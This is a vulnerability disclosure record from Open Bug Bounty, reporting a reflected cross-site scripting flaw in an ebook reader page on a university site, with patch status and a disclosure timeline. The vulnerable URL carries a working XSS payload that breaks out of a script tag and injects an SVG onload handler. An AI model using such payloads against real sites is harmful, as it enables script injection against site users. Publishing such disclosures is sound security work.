ir.exp.sis.pitt.edu XSS vulnerability

2017-01-09T01:02:00
ID OBB:204751
Type openbugbounty
Reporter jag0xff
Modified 2017-01-16T09:14:00

Description

Vulnerable URL:
http://ir.exp.sis.pitt.edu/ebooks/reader.php?bookid=%27%22--!%3E%3C/Script/%3E%3CSvg/Onload=confirm`OPENBUGBOUNTY`//&docno=lamming-0196&page=1&usr=&grp=
Details:

Description| Value
---|---
Patched:| Yes, on 07.03.2017
Latest check for patch:| 07.03.2017 21:30 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check ir.exp.sis.pitt.edu SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 January, 2017 01:02 GMT
Vulnerability existence verified and confirmed| 9 January, 2017 08:42 GMT
Generic security notifications sent to website owner| 9 January, 2017 08:42 GMT
Notification sent to subscribers (without technical details)| 9 January, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 16 January, 2017 09:14 GMT